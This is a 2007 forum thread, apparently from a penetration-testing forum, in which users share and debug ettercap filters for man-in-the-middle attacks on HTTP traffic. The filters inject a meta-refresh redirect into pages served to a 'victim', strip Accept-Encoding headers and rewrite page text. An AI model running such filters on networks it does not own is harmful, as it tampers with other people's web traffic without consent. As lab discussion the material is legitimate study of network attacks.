ettercap filter

**imported_spankdidly** · 09-11-2007, 09:28 PM

This may not help in the slightest, but a filter I found awhile back for redirecting webpages.

if (ip.proto == TCP && tcp.src == 80) {
replace("<HEAD>", "<HEAD><META http-equiv=\"refresh\" content=\"0;URL=http://www.zombo.com\">");
replace("<head>", "<head><META http-equiv=\"refresh\" content=\"0;URL=http://www.zombo.com\">");
msg("zombo'ed!\n");
}

**thorin** · 09-11-2007, 09:44 PM

Do you ever see "run" or "run2" in the message window?

It "shouldn't" matter but your curley braces {} are on the wrong lines (see the other examples you've quoted).
Also don't forget the "\n" in your msg output for new (or next) line.

Are you running ettercap on the same machine you're using as the victim?

**Tex-Twil** · 09-17-2007, 02:38 PM

Originally Posted by thorin

Do you ever see "run" or "run2" in the message window?

No I haven't

Originally Posted by thorin

It "shouldn't" matter but your curley braces {} are on the wrong lines (see the other examples you've quoted).

I'm not sure to understand. Do you mean a difference between

Code:

if ( .... ) {
 ..
}

and

Code:

if ( .... ) 
{
 ..
}

Originally Posted by thorin

Also don't forget the "\n" in your msg output for new (or next) line.

ok, I'll add the \n

Originally Posted by thorin

Are you running ettercap on the same machine you're using as the victim?

No, ettercap is running on a different machine

**incognite** · 09-17-2007, 04:14 PM

.... Have a look at your code...I believe your searching for something other than Accept-Encoding???/l
if (search(DATA.data, "Accept-Encoding"))

**thorin** · 09-17-2007, 04:56 PM

I'm not sure to understand. Do you mean a difference between

Yes. But like I said it "shouldn't matter", though I've seen stupid things like that kill people in the past.

Do you see "zapped Accept-Encoding!" in the message window when you tested that example?

**Tex-Twil** · 09-17-2007, 05:11 PM

Originally Posted by thorin

Do you see "zapped Accept-Encoding!" in the message window when you tested that example?

Yes I do. But I don't see "run" nor "run2". (maybe cos of the "\n" ?) I'll try it again once I'm back home and I'll let you know.

**thorin** · 09-17-2007, 05:41 PM

Well the zapped message does contain the /n so run or run2 should appear on the line after it, if they're being triggered correctly.

**Tex-Twil** · 09-17-2007, 07:45 PM

So here we go again. This is the filter:

Code:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) 
{
   if (search(DECODED.data, "Google")){
      replace("Google", "GOOGLE"); 
      msg("run\n");
   }

   if (search(DATA.data, "Google")){
      replace("Google", "GOOGLE"); 
      msg("run2\n");
   }
}

When a victims loads a google page, I see "zapped Accept-Encoding!" in Ettercap console. Wireshark can see those modified packets.

But I can't see "run" or "run2".

**Tex-Twil** · 09-29-2007, 01:08 PM

Am I the only one with this problem ?

**imported_spankdidly** · 10-01-2007, 08:17 PM

And you're changing all the Iptables stuff from irongeeks page? I never really had a problem. Some pages didn't work, but most did (with his script). Not sure where you are going wrong.

BackTrack Linux - Penetration Testing Distribution

Thread: ettercap filter

Thread Tools

Search Thread

Display

Posting Permissions